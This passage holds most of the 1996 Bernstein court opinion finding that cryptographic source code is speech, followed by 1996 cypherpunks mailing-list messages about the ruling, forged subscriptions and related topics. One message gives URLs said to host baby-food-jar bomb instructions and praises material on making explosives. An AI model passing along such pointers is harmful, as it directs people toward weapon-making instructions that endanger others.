As this court finds that the AECA does not preclude judicial review of
colorable constitutional claims, it must determine if plaintiff's claims
are colorable in order to decide the issue of justiciability.


  II.  Colorability of Plaintiff's Constitutional Claims

Defendants maintain that plaintiff has raised no colorable
constitutional claim because this case does not concern "speech"
protected by the First Amendment, and even if it does, the minimal
infringement is excusable under O'Brien v. United

U.S. 367 (1968). Defendant's further argue that plaintiff has not made a
colorable claim that the CJ determinations constitute a prior restraint
or that the AECA and ITAR are overbroad or vague.9 Plaintiff responds
that the items that were subject to CJ determinations are speech of the
most protected kind.


       A.   Analytical Framework

To determine if Bernstein states a "colorable constitutional claim," it
is helpful to know what standard obtains. Colorability, a concept often
employed by courts, is

rarely defined. Not surprisingly, discussions of colorability appear to
be highly specific to both the claim and context in which they arise.

The Ninth Circuit has adopted the proposition that a constitutional
claim is not colorable if it is clearly immaterial and made only for the
purposes of jurisdiction, or "is wholly insubstantial or frivolous."
Hoye v. Sullivan, 985 F.2d 990, 991-92 (9th Cir. 1993) (citing Boettcher
v. Secretary of HHS, 759 F.2d 719, 722 (9th Cir. 1985)).

On a number of occasions the Ninth Circuit has addressed whether
constitutional claims were colorable in the context of national security
decisions. These have been largely due process and equal protection
challenges to revocations of a security clearance. Dorfmont v. Brown,
913 F.2d 1399 (9th Cir. 1990), cert. denied, 499 U.S. 905 (1991); High
Tech Gays v. Defense Ind. Sec. Clearance Off., 895 F.2d 563 (9th Cir.),
reh'a denied, en banc, 909 F.2d 375 (1990); Dubbs v. CIA, 866 F.2d 1114
(9th Cir. 1989).

In Dorfmont the court held that there was no cognizable liberty or
property interest in a security clearance that could give rise to a due
process claim and therefore the claim was not colorable. The Dorfmont
court noted, however, that it had found equal protection challenges to
security clearance denials colorable in Hiah Tech Gays. 913 F.2d at
1403. In fact, in Hiah Tech Gays the court bypassed the issue of
colorability altogether and concluded on the merits that homosexuals
were


not a suspect or quasi-suspect class for purposes of heightened equal
protection scrutiny.10 Plaintiffs in High Tech Gays had also brought a
First Amendment claim based on freedom of association. The court found
that plaintiffs had failed to allege or show a security clearance had
been denied solely by reason of their membership in a gay organization
and, therefore, there was no case or controversy with respect to that
claim. In Dorfmont the court described its disposition of the First
Amendment claim in Hiah Tech Gays as failure "to allege sufficient facts
to raise a justiciable First Amendment claim." 913 F.2d at 1403 n.2. It
is unclear whether the court's discussion of justiciability in Dorfmont
applies to lack of colorabilty, and if so, what standard it implies. As
Hoye is the most recently and clearly articulated of the Ninth Circuit's
attempts to define colorability, its standard will govern the court's
analysis in this case.


     B.   Analysis

Neither party agrees on exactly which items are at issue in this case,
which confounds the analysis of whether subjecting them to a licensing
requirement raises a colorable First Amendment claim. Defendants claim
that only Snuffle.c and Unsnuffle.c are controlled by the USML and
subject to the I licensing requirement. This is based on the 1995 letter
the ODTC sent to plaintiff after he had filed suit in which it clarified
that the CJ determinations did not include any

explanatory information, including the paper. This clarification would
have been more appropriate in response to plaintiff's letter of July 15,
1993. Bernstein claims that his paper, "The Snuffle Encryption System,"
remains on the USML and that he has not been able to publish it without
a license. It seems evident from the correspondence between Bernstein
and the ODTC that the paper was indeed determined to be on the USML at
the latest by October 5, 1993, but that as of June 29, 1995, the ODTC
disavowed that decision. It is disquieting that an item defendants now
contend could not be subject to regulation was apparently categorized as
a defense article and subject to licensing for nearly two years, and was
only reclassified after plaintiff initiated this action. Nonetheless,
given defendants' reevaluation, the claims pertaining to the paper now
appear moot.12


          1.   Speech

The paper, an academic writing explaining plaintiff's scientific work in
the field of cryptography, is speech of the most protected kind. See
Sweezv v. New Hampshire, 354 U.S. 234, 249-50 (1957) (noting the
importance of protecting scholarship and academic inquiry). Nor do
defendants contest this. Rather, defendants contend that Snuffle.c and
Unsnuffle.c--the source code for the encryption program--are not speech
but conduct. Plaintiff argues that computer code inscribed on paper,
like any non-English language, is speech

protected by the First Amendment .13 Plaintiff further argues that even
functional software is treated as protectable expression under copyright
law. 14

Defendants urge this court to find the source code for Snuffle
unprotected conduct rather than speech. They cite Texas v. Johnson, 491
U.S. 397 (1989), for the proposition that conduct must be "'sufficiently
imbued with the elements of communication"' to fall within the
protections of the First Amendment. Id. at 404 (quoting Spence v.
Washington, 418 U.S. 405, 409 (1974)). In evaluating the communicative
aspects of burning a flag in Texas v. Johnson, the Court framed the
inquiry as whether the conduct entails an intent to convey a particular
message and the likelihood of that message being understood. Id.
According to defendants, the source code, as a functioning cryptographic
product, is not intended to convey a particular message. It cannot be
speech, they say, because its purpose is functional rather than
communicative.

However, the Court in both Johnson and Spence, the flag desecration case
upon which Johnson relies, inquired into the communicative nature of
conduct only after concluding that the act at issue was indeed conduct
and not speech. Both cases strongly imply that a court need only assess
the expressiveness of conduct in the absence of "the spoken or written
word." Johnson, 491 U.S. at 404; see Spence, 418 U.S. at 409 ("To be
sure, appellant did not choose to articulate his views through printed
or spoken words. It is therefore necessary to


determine whether his activity was sufficiently imbued with elements of
communication to fall within the scope of the First and Fourteenth
Amendments ...."). In the instant case, Bernstein's encryption system
is written, albeit in computer language rather than in English.
Furthermore, there is little about this functional writing to suggest it
is more like conduct than speech. A computer program is so unlike flag
burning and nude dancing that defendants' reliance on conduct cases is
misplaced. It would be convoluted indeed to characterize Snuffle as
conduct in order to determine how expressive it is when, at least
formally, it appears to be speech. Recently the Ninth Circuit addressed
the difference between speech and expressive conduct in assessing the
constitutionality of the English-only provision amended to Arizona's
constitution. Yniguez v. Arizonans for Official English, 69 F.3d 920,
934-36 (9th Cir. 1995) (en banc), cert. granted, 64 U.S.L.W. 3639 (U.S.
Mar. 25, 1996) (No. 95-974). Defendants in Yniguez, like defendants
here, sought to characterize one's choice of language as expressive
conduct. The court was similarly "unpersuaded by the comparison between
speaking languages other than English and burning flags." Id. at 934.
The court further concluded that language was speech by definition:

	Of course, speech in any language consists of the '	expressive
conduct' of vibrating one's vocal chords, moving one's mouth and
thereby making sounds, or of putting pen to paper, or hand to
keyboard. Yet the fact 	16 that such 'conduct' is shaped by
language--that is, a sophisticated and complex system of understood
meanings--is what makes it speech. Language is by definition
speech, and the regulation of any language is the regulation of
speech. 

Id. at 934-35. Nor does the particular language one chooses change the
nature of language for First Amendment purposes. This court can find no
meaningful difference between computer language, particularly high-level
languages as defined above, and German or French. All participate in a
complex system of understood meanings within specific communities. Even
object code, which directly instructs the computer, operates as a
"language." When the source code is converted into the object code
"language," the object program still contains the text of the source
program. The expression of ideas, commands, objectives and other
contents of the source program are merely translated into
machine-readable code. 15 

Whether source code and object code are functional is immaterial to the
analysis at this stage. Contrary to defendants' suggestion, the
functionality of a language does not make it any less like speech. The
Yniguez court noted that "the choice to use a given language may often
simply be based on a pragmatic desire to convey information to someone
so that they may understand it." Id. at 935. Thus, even if Snuffle
source code, which is easily compiled into object code for the computer
to read and easily used for encryption, is essentially functional, that
does not remove it from the realm of speech. Instructions,
do-it-yourself manuals, recipes, even technical information about
hydrogen bomb construction, see United States v. The Progressive. Inc.,
467 F. Supp. 990 (W.D. Wisc. 1979), are often purely functional; they
are also speech.

Music, for example, is speech protected under the First Amendment.  See
Ward v. Rock Against Racism, 491 U.S. 781, 790 (1989). The music
inscribed in code on the roll of a player piano is no less protected for
being wholly functional. Like source code converted to object code, it
"communicates" to and directs the instrument itself, rather than the
musician, to produce the music. That does not mean it is not speech.
Like music and mathematical equations, computer language is just that,
language, and it communicates information either to a computer or to
those who can read it. 16

Defendants argue in their reply that a description of software in
English informs the intellect but source code actually allows someone to
encrypt data. Defendants appear to insist that the higher the utility
value of speech the less like speech it is. An extension of that
argument assumes that once language allows one to actually do something,
like play music or make lasagne, the language is no longer speech. The
logic of this proposition is dubious at best. Its support in First
Amendment law is nonexistent.

By analogy, copyright law also supports the "expressiveness" of computer
programs. Computer software is subject to copyright protection as a
"literary work." 17 U.S.C. Sections 101, 102(a)(1); accord Johnson Controls v.
Phoenix Control Systems, 886 F.2d 1173, 1175 (9th Cir. 1989). For the
purposes of copyright, literary works "are works, other than audiovisual
works, expressed in words, numbers, or other verbal or numerical symbols
or indicia, regardless of the nature of the material objects, such as
books, periodicals, manuscripts, phonorecords, film, tapes, disks, or
cards, in which they are embodied." 17 U.S.C. Section 101.

A computer program is further defined under the copyright statute as "a
set of statements or instructions to be used directly or indirectly in a
computer in order to bring about a certain result." Id. (emphasis
added). Source code is essentially a set of instructions that is used
indirectly in a computer since it must first be translated into object
code to achieve the desired result. The statutory language, along with
the caselaw of numerous circuits, supports the conclusion that copyright
protection extends to both source code and object code. See NLFC. Inc.
v. Devcom Mid-America. Inc., 45 F.3d 231, 234-35 (7th Cir.), cert.
denied, 115 S.Ct. 2249 (1995) ("Both the source and object codes to
computer software are also individually subject to copyright
protection.") (citations omitted); Johnson Controls, 886 F.2d at 1175
("Source code and object code, the literal components of a program, are
consistently held protected by a copyright on the program.") (citations
omitted); Apple Computer. Inc. v. Franklin Computer Corp., 714 F.2d
1240, 1249 (3d Cir. 1983), cert. dismissed, 464 U.S. 1033 (1984).

Copyright protection, designed to protect original expression, 17 U.S.C.
Section 102(a), supports the likeness of a computer program to speech as
defined by First Amendment law. The expression of an idea, a~ opposed to
the idea itself, which is not afforded copyright protection under 17
U.S.C. Section 102(b), connotes the "speaking" of an idea. An encryption
program expressed in source code communicates to other programmers and
ultimately to the computer itself how to make the encryption algorithm
(the idea) functional. Nor, under copyright law, does sheer
functionality diminish the expressive quality of a copyrightable work.
Apple Computer. Inc., 714 F.2d at 1252 (citing Mazer v. Stein, 347 U.S.
201, 218 (1954)); cf. Lotus Dev. Corp. v. Borland Int'l. Inc., 49 F.3d
807, 815 (lst Cir. 1995), judgment aff'd, 116 S.Ct. 804 (1996) (holding
that a text describing how to operate something is subject to copyright
protection while the method of operation itself is not). While copyright
and First Amendment law are by no means coextensive, and the analogy
between the two should not be stretched too far, copyright law does lend
support to the conclusion that source code is a means of original
expression.

For the purposes of First Amendment analysis, this court finds that
source code is speech. Having concluded that all the items at issue,
including Snuffle.c and Unsnuffle.c are speech, this court must now
briefly review the claims defendants contest for colorability.

          2.   O'Brien
Defendants, relying on a characterization of Snuffle as conduct, argue
that even if that conduct is expressive, the relatively mild O'Brien
test should be employed. United States v. O'Brien, 391 U.S. 367 (1968),
establishes the standard for assessing when a governmental regulation of
conduct may nonetheless run afoul of the First Amendment's speech
protections. Under O'Brien a regulation of conduct that incidentally
restricts speech will be valid if 1) it is within the power of the
government, 2) it furthers an important or substantial government
interest, 3) the government interest is unrelated to the suppression of
free expression and 4) the incidental restriction on speech is no
greater than is essential to further that interest. Id. at 377.

Given that Snuffle source code is speech and not conduct, O'Brien does
not appear to provide the appropriate standard under which to evaluate
plaintiff's claims.17 However, as the parties have not had an
opportunity to brief the issue of what First Amendment standard obtains,
the court will apply O'Brien for the limited purpose of determining
colorability. Defendants make a strong case that the AECA and ITAR
satisfy the first and second prongs of O'Brien--that they are within the
government's power and further the important interest of national
security. With respect to prongs three and four, however, this court
cannot say that plaintiff~s contentions are frivolous. Both the
technical data provision of the ITAR, 22 C.F.R. Section 120.10, and Category
XIII of the USML, 22 C.F.R. Section 121.1, regulating cryptographic software
appear to relate to the "suppression of free expression" and may reach
farther than is justifiable.

Defendants also argue that the Ninth Circuit's decision in United States
v. Edler Industries Inc., 579 F.2d 516 (9th Cir. 1978), precludes a
First Amendment attack under O'Brien on the AECA and its accompanying
regulations. In Edler the court reviewed a conviction under the
predecessor of the AECA for unlicensed exportation of technical data
relating to a defense article on the USML. The technical data at issue
in Edler related to a technique of tape wrapping with applications for
missile components. After finding that "an expansive interpretation of
technical data relating to items on the Munitions List could seriously
impede scientific research and publishing and international scientific
exchange," ~ at 519, the court went on to adopt a narrowing construction
to save the statute. 18 Defendants urge that if Edler allows the
government to legitimately restrict the export of technical data
relating to a defense article, it can certainly restrict the defense
article itself. Such an argument is an extension of Edler this court is
unwilling to adopt. The validity of the of the munitions list was simply
not at issue in that case. While Edler will be instructive to an
analysis of the AECA under the First Amendment, it is sufficiently
distinguishable on its facts that it cannot preclude plaintiff's
challenge at this stage.

While the court makes no judgment on the merits, it finds plaintiff
alleges facts sufficient to state a nonfrivolous First Amendment claim
and hence that claim is colorable.

          3.   Prior Restraint

Plaintiff alleges that the AECA and ITAR act as an administrative
licensing scheme for the publication of scientific papers, algorithms
and computer programs related to cryptography, since publishing could
release that information to foreign persons and would constitute
exportation under the ITAR. 22 C.F.R. Section 120.17 .19

Governmental licensing schemes, such as the AECA and ITAR, come with a
heavy presumption against their validity when they act as a prior
restraint on speech. See Nebraska Press Assoc. v. Stuart, 427 U.S. 539
(1976); New York Times Co. v. United States, 403 U.S. 713 (1971) (per
curiam); Near v. Minnesota, 283 U.S. 697 (1931). Prior restraints have
even been struck down in the face of national security concerns. See
e.a. New York Times, 403 U.S. at 714 (dissolving retraining order
against newspaper publication of Pentagon Papers that included
classified information). In New York Times the national security
asserted was too vague a justification for prior restraints. Id. at 719
(Black, J., concurring), 725-26 (Brennan, J., concurring). In his
concurrence to the per

curiam decision, Justice Stewart suggested a stringent test for
permissible prior restraints, allowing them only when "disclosure . . .
will surely result in direct, immediate, and irreparable damage to our
Nation or its people." Id. at 730 (Stewart J., concurring). In response
to the prior restraint claim, defendants rely on the argument rejected
above, that Snuffle is not speech and does not implicate the First
Amendment.

Since Snuffle is speech that is potentially subject to the prior
restraint of licensing, and under the AECA that restraint is
unreviewable, plaintiff's prior restraint claim is colorable. 20

          4.   Overbreadth

Plaintiff alleges that the AECA and ITAR are overbroad with respect to
their regulation of items with predominately civil applications, the
definition of export, Category XIII of the USNL, and the definition of
software.

Defendants rely extensively on Edler to argue that any overbreadth
challenge is foreclosed to plaintiff because the Ninth Circuit has
provided a limiting construction to the technical data provision. They
also cite the 1984 revisions to ITAR which they contend are even more
solicitous of speech because they provide for certain exemptions from
technical data for academic research and information in the "public
domain." Defendant Exh. lA. However, plaintiff's overbreadth claim goes

beyond the technical data provision and beyond those items classified as
technical data. The complaint makes clear that the challenge is
significantly broader than the scope of Edler and pertains to the
defense articles themselves.

Facial overbreadth is concededly "strong medicine" employed as a last
resort when a limiting construction cannot be applied to a statute.
Broadrick v. Oklahoma, 413 U.S. 601, 613 (1973). Defendants employ
Broadrick to propose that when conduct as well as speech is regulated,
the overbreadth must be substantial in relation to the statute's
legitimate sweep. Id. at 615. However, in a subsequent Supreme Court
decision relied upon by defendants, Members of the City Council of Los
Angeles v. Taxpayers for Vincent, 466 U.S. 789 (1984), the Court noted
that "where the statute unquestionably attaches sanctions to protected
conduct, the likelihood that the statute will deter that conduct is
ordinarily sufficiently great to justify an overbreadth attack." Id. at
801 n.l9 (citing Erznoznik v. City of Jacksonville, 422 U.S. 205
(1975)). In Taxpayers for Vincent the Court clarified the application of
substantial facial overbreadth, saying there must be a "realistic danger
that the statute itself will significantly compromise recognized First
Amendment protections of parties not before the Court ...." Id. at
801. Merely being able to conceive of "some impermissible applications
of a statute" is insufficient. Id. at 800.

As this court has noted above, cryptographic source code is speech. Even
if the statute aims at conduct as well as speech so as to invoke the
"substantial overbreadth" doctrine, the court at this stage of the
proceedings need only determine whether the claim is colorable. On the
record before it at this time, the court cannot say that plaintiff's
claim that enforcement of some provisions of the statute or regulations
could significantly compromise the protected speech of third parties is
frivolous.

          5.   Vagueness

Plaintiff alleges that a number of terms and provisions within the AECA
and ITAR are impermissibly vague in that they fail to give notice of the
conduct they regulate and have a chilling effect on speech. These
provisions include inter alia the meaning of software capable of
maintaining secrecy under Category XIII of the USML, the exemptions for
information taught in universities, the definition of public domain, and
the "willful" requirement for criminal penalties.

For a claim of facial vagueness to survive, the deterrent effect of the
statute on protected expression must be "real and substantial" and not
easily narrowed by a court. Young v. American Mini Theaters. Inc., 427
U.S. 50, 60 (1976). Defendants again rely heavily on Edler to argue that
the Ninth Circuit has already resolved the problems plaintiff
challenges. While this may be true of the technical data provision, it

leaves unaddressed numerous other areas of concern. Defendants also
conclude summarily that both the definition of cryptographic software
and the exemptions from this definition are clear to a person of
ordinary intelligence. This seems to be a bit of dissimulation, unless
it is a confession, since the ODTC itself mistakenly classified
Bernstein's academic paper as a defense article under Category XIII.
Finally, defendants contest plaintiff's vagueness challenge to the
"willful" requirement for criminal penalties, citing the Ninth Circuit's
clarification that under the AECA willfulness requires a "voluntary,
intentional violation of known legal duty ...." United States v.
Lizarraga-Lizarraga, 541 F.2d 826, 828 (1976) (construing the
predecessor to the AECA). According to Posters 'N' Things. Ltd. v.
United States, _ U.S. _ , 114 S. Ct. 1747, 1754 (1994), such a scienter
requirement helps to avoid the problem of vagueness a criminal statute
might otherwise allow.

With the exception of the claim against the willful standard for
criminal violations of the AECA, this court does not find plaintiff's
claims of vagueness frivolous.

It should be emphasized that with the exception of its conclusions that
source code is speech for the purposes of the First Amendment and that
this case is justiciable, the court makes no other substantive holdings.

CONCLUSION

For the reasons set forth above, IT IS HEREBY ORDERED that defendants'
motion to dismiss is DENIED.


IT IS SO ORDERED.


Dated:   April 15, 1996			MARILYN HALL PATEL
					United States District Judge

ENDNOTES

1. Defendants pose the justiciability issue as one of subject matter
jurisdiction. As those questions are distinct and defendants arguments
go to justiciability, this court addresses the motion as one pertaining
to justiciability alone. See Baker v. Carr, 369 U.S. 186, 198 (1962).

2. Except where noted, these facts come from undisputed portions of the
record.

3. Source code is the text of a source program and is generally written
in a high-level language that is two or more steps removed from machine
language which is a low-level language. High-level languages are closer
to natural language than lowlevel languages which direct the functioning
of the computer. Source code must be translated by way of a translating
program into machine language before it can be read by a computer. The
object code is the output of that translation. It is possible to write a
source program in high-level language without knowing about the actual
functions of the computer that carry out the program. Encyclopedia of
Computer Science 962, 1263-64 (Anthony Ralston & Edwin D. Reilly eds.,
3d ed. 1995)

4. The parties disagree about whether the computer code submitted by
plaintiff to the State Department is technically "software." Defendants
refer to the computer code as software even though it i8 not in object
code on a disk. Plaintiff contests this characterization. In any event,
in order to be software, which are instructions to the computer, the
instructions must be in a form that can be easily altered as
distinguished from firmware or hardware which cannot be readily altered,
if it can be altered at all.

The court notes that 22 CFR Section 121.8(f) defines "software" for the
purposes of the AECA. That definition is descriptive of content,
however, and does not define the actual format or physical form of the
software. At this stage the court need not resolve this issue since
whatever the program's form, the ODTC has subjected it to the licensing
requirements.

5.   The CJ request of July 15, 1993, refers to the items as W BCJF-2, W
BCJF-3, DIBCJF-4, DJBCJF-5, and W BCJF-6 without distinguishing
information. Complaint Exh. D.

6. This statement appears to be contradicted by that court's own
reference to defendants' overbreadth claim on the preceding page of its
opinion. Martinez, 904 F.2d at 601. It is not clear whether the
overbreadth argument went to constitutionality or merely to statutory
interpretation.

7. Plaintiff argues that this court has power to review his cause of
action under a political question analysis. Even if that were so, he
fails to consider the effect of a clear statement by Congress precluding
judicial review in the context of the AECA. Furthermore, plaintiff
dedicates nearly ten pages of his brief in opposition to this motion to
arguing that review is proper under the Administrative Procedure Act
("APA"). However, as defendants note, to the extent judicial review is
precluded by statute, it is also precluded by the APA. 5 U.S.C. Section
701(a)(1) ("This chapter applies . . . except to the extent that--(l)
statutes preclude judicial review ...."). That does not necessarily
mean plaintiff's allegation that defendants exceeded their lawful
authority under the APA is unreviewable. Plaintiff is correct that U.S.
v. Bozarov allows courts to exercise review, in the face of statutory
preclusion, of "claims that the Secretary acted in excess of his
delegated authority under the EAA." 974 F.2d at 1045. Nonetheless,
defendants only argue nonjusticiability based on the First Amendment
claim. This court declines to rule on the colorability of every one of
plaintiff's claims without briefing on those issues. Currently before
the court is simply the issue of the justiciability of plaintiff's First
Amendment challenge.

8. The Court did not consider whether Doe presented a colorable
constitutional claim because that question was not properly before the
Court.

9. Defendants only argue in passing that plaintiff's claim that the CJ
determinations were made in excess of statutory authority is not
justiciable.

10. The discussion of Hiah Tech Gays in Dorfmont betrays the unusual
procedural posture the Ninth Circuit adopted in order to reach the
merits: "Without addressing whether the federal courts have jurisdiction
to hear these claims, we ruled in favor of defendants on the merits of
the equal protection attack." 913 F.2d at 1403 (emphasis added)
(citation omitted).

11. Reading "colorable" to mean sufficient to state a claim, or even
nonfrivolous, is supported by the Sixth Circuit's decision in Brooks v.
Seiter, 7-79 F.2d 1177, 1181 (6th Cir. 1985), in which the court, using
a frivolousness standard, held that plaintiff prisoners had alleged a
First Amendment violation when they complained that prison officials
withheld mail order publications. In the context of that holding, the
court said that the state interest in deferring to prison officials did
not bar courts from hearing a "colorable constitutional claim." Id.

12. If there is any uncertainty about this, defendants should state
their determination without equivocation so that the mootness issue can
be completely resolved as soon as possible.

13. Bernstein also contends that encryption software is important not
only as speech, but as a tool to protect private speech. Plaintiff
argues that cases protecting anonymous speech and prohibiting compelled
speech support this novel proposition. However, certainly at this stage,
the court need not reach the issue.

14. Plaintiff briefly argues that his encryption program, written in
source code on paper, is not functional at all. Given the ease with
which one can convert source code into object code, however, this
argument is specious. More to the point is plaintiff's contention that
source code and functioning software are both fully protected under the
First Amendment.

15. The court does not employ the word "translate" as art thereby
excluding the applicability of "compile", "interpret" or related terms.

16. Whether such "languages" as assembly language or low-level languages
constitute speech, or may sometimes constitute speech, need not be
addressed at this time in view of the court's ruling that the source
code provides the basis for a colorable claim.

17. Plaintiff cites Justice Department memoranda that question the
constitutionality of some of the ITAR provisions as well as the
propriety of an O'Brien analysis. Plaintiff Exh. A at 60007, 60090. A
1978 memo from the DOJ Office of Legal Counsel addressing the
constitutionality of the ITAR restrictions on public cryptography noted
that "even a cursory reading of the technical data provisions reveals
that those portions of the ITAR are directed at communication. A more
stringent constitutional analysis than the O'Brien test is therefore
mandated." Plaintiff Exh. A at 60084 n.16. While Snuffle was classified
as a munition rather than as technical data, Category XIII of the USML
also directly regulates public cryptography.

18. The court's narrowing construction mandates that the statute and
regulations only prohibit the export of technical data "significantly
and directly related to specific articles on the Munitions List. n 579
F.2d at 521.

19. Defendants continue to argue that plaintiff was mistaken about the
inclusion of the academic paper in the CJ determinations made by the
ODTC. As the court has noted, plaintiff had every reason to believe his
paper had been determined to be a defense article until defendants'
clarifying letter of June 29, 1995. Whether or not the prior restraint
that may have been applied to the paper is still relevant or
whether this confusion could happen again given the apparent
applicability of the public domain exception to work of this kind, 22
C.F.R. Section 120.11(a)(8), is a matter the court declines to address at this
time.

20. Defendants are correct that with respect to the two instructional
items included in the second CJ determination and which ODTC
subsequently identified as technical data, a prior restraint claim seems
foreclosed by Edler, 579 F.2d at 521 ("So confined, the statute and
regulations are not overbroad. For the same reasons the licensing
provisions of the Act are not an unconstitutional prior restraint on
speech.").

[end]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ecafe Mixmaster Remailer <mixmaster@remail.ecafe.org>
Date: Fri, 19 Apr 1996 14:57:03 +0800
To: cypherpunks@toad.com
Subject: Re: "STOP SENDING ME THIS SHIT"
In-Reply-To: <199604171641.JAA26692@atropos.c2.org>
Message-ID: <199604190345.EAA04240@pangaea.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


> From: sameer@c2.org
>
> > I think the "clueless" mailing list is a must at this point.
> 
> 	clueless@c2.org/majordomo@c2.org
> 
> 	subscribe idiots as necessary.

But...  will it have any traffic?  How will people know they are on
the list if they ignore the original subscription confirmation?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sat, 20 Apr 1996 02:34:53 +0800
To: Sameer Parekh <sameer@c2.org>
Subject: no help for the clueless
Message-ID: <v03006601ad9d2fc751ae@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


Sameer,

I submit that the "info" command should be implemented with a little ReadMe
for clueless "subscrivers"... this is part of the idea, right?

   dave

................................. cut here .................................

>Date: Fri, 19 Apr 1996 04:38:16 -0700 (PDT)
>To: ddt@lsd.com
>From: Majordomo@c2.org
>Subject: Majordomo results: info clueless
>
>--
>
>>>>> info clueless
>#### No info available for clueless.
>>>>>
>>>>>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 20 Apr 1996 02:42:08 +0800
To: Peter Monta <pmonta@qualcomm.com>
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <199604190607.XAA17848@mage.qualcomm.com>
Message-ID: <199604191221.IAA11773@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Peter Monta writes:
> No, he's correct; cryptanalytic schemes like those you mention rely
> on statistical toeholds *in the context of a deterministic cipher
> algorithm*.  For one-time pads that are "cooked" or "screened" (and
> I agree that it's a silly thing to do), the toehold is much weaker,
> infinitesimal in fact.

Please learn what the context of the discussion was before
commenting. It was not about using cooked streams for one time pads.

Furthermore, I suggest you look up the Venona intercept work and tell
me again about how far an advesary will go with a tiny toehold.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Loysen <dwl@hnc.com>
Date: Sat, 20 Apr 1996 04:56:19 +0800
To: cypherpunks@toad.com
Subject: Re: plaugue of unsubscribes
Message-ID: <199604191618.JAA20702@spike.hnc.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:01 PM 4/18/96 -0700, you wrote:
>On Thu, 18 Apr 1996, Alex Strasheim wrote:
>
>> I've started sending mail to postmasters when I get one of those "take me
>> off your list!" messages.
>[snip]
>
>See John's message about the forged subscribes.  It sounds like these
>folks may have never used a mailing list and didn't want to.  Can't really
>blame them for being upset at receiving hundreds of pieces of email that
>they didn't ask for.
>
>What still confuses me is the number of people who asked to be
>"unsubscrived."  Seems like an odd coincidence that all those folks would
>miss the B key.  Some had done it severeal times in the same message.  I
>wonder if they were totally set up -- if they got mail telling them to
>"unsubscrive."  Some people's idea of fun boggles me...
>
>Rich
>
The firewalls list got a bunch of "signoff" requests over the last few days.
Same gag I'd wager. The Firewalls list owner said he unsubscribed over 200
people who appeared to have been falsely subscribed.


=====================================
dwl@hnc.com

Zippity do da, zippity ah, my oh my what a wonderful day.
Ya right, and here I am without time to finish a cup of coffee.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 20 Apr 1996 03:31:42 +0800
To: cypherpunks@toad.com
Subject: Re: DANGER! Baby-Food Bombs on the Internet! [was Re: (Fwd)]
Message-ID: <199604191321.GAA13317@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Rich Graves <llurch@networking.stanford.edu>
> 
> On Thu, 18 Apr 1996, the intrepid anonymous-remailer@shell.portal.com
> FUDded to cypherpunks:
> 

[Senatorial panic at the spread of knowledge deleted]

> Does anyone know the documents that Senator Biden is quoting? I *must
> know* how to build The Dreaded Baby-Food Bomb.

As usual, altavista comes to the rescue.

*A* baby food jar bomb is described at:

	http://studentweb.tulane.edu/~llovejo/explode.txt

and echoed overseas at

	http://ps.cus.umist.ac.uk/~vivaldi/boom/original.txt 


I could not find the article on harvesting gunpowder from shotgun shells. Neat stuff in
australia on making primary and secondary explosives however (neurocactus).

With the Internet in place, government attempts to legislate the flow of ideas and 
knowledge are about as effective as attempts to legislate the migration routes of birds. 

Peter Trei
trei@process.com 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 20 Apr 1996 04:37:32 +0800
To: cypherpunks@toad.com
Subject: (Fwd) Re: GPS-based authentication (response)
Message-ID: <199604191446.HAA11803@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain



As many of you will remember, I wrote last week to Dorothy Denning
and Peter McDoran, describing some of the reservations expressed
on the cpunk list concerning their 'cyberlocator' scheme. They've
both responded, but not in a terribly helpful form.

Denning wrote back quickly to say that she was going out of town,
and that her colleague would respond.

MacDoran took 6 days to reply, and then only to say that if my 
employer entered into a non-disclosure agreement with ISR Inc,
then all my concerns "would be addressed".

I wrote back to MacDoran, suggesting that open disclosure of their
techniques would build confidence in their product, and requesting
permission to repost his letter to the cpunk list. He has not responded
after 24 hours.

Peter Trei
ptrei@acm.org 


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 20 Apr 1996 06:36:45 +0800
To: John Deters <cypherpunks@toad.com>
Subject: Re: EFF/Bernstein Press Release
Message-ID: <2.2.32.19960419174615.00a65100@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:52 PM 4/18/96 -0500, John Deters wrote:
>>On Thu, 18 Apr 1996, Mark Neely wrote:
>>
>>> Well, that puts legislation making virus authoring a crime
>>> into a new (and difficult) position.
>
>My understanding is that it isn't illegal to author a virus, but it
>certainly would be to release it.

I think there is a confusion here between source code and object code.

I am sure that the lawyers on the list will correct me on this if I am wrong
here... The way I read this ruling is that it would have not effect on the
laws on releasing viruses in code. (i.e. putting a virus into an executable
and letting it go out to infect the world.) What it would permit would be
publication of virus source and information about viruses.

Publication of information about viruses (including source code) has a
useful purpose.  How can people write anti-virus programs if they do not
know how they work?  If publication of techniques is stopped, the anti-virus
people have to wait until they find a live copy before writing something to
detect and/or remove the offending code.  The virus writers are going to do
this whether or not they can publish.  Letting them brag makes them faster
to stop.

The "let them brag" principle also works with system hacks.  Finding what
techniques are used will let you plug holes that you may not know about.  It
is better to have information than not.

On to another [rant]...

I have been seening a surprising amount of rant from the forces of
Government about keeping information out of "the hands of terrorists".  I am
wondering how this is going to be brought about.  The books are there.  They
can be ordered from a number of mail order firms.  They can also be found in
used book stores across the country.  The information is alos on the net, on
cd-roms and other mediums of storage.  How are they going to stuff the
tentacles back into the can?

Without imposing a very represive police state, they cannot.  It would
require sifting through all of the available data (books, magazines,
libraries, etc.) and removing all "offending" information.  Since weapons
are so easy to make, they would have to remove knowlege relating to a wide
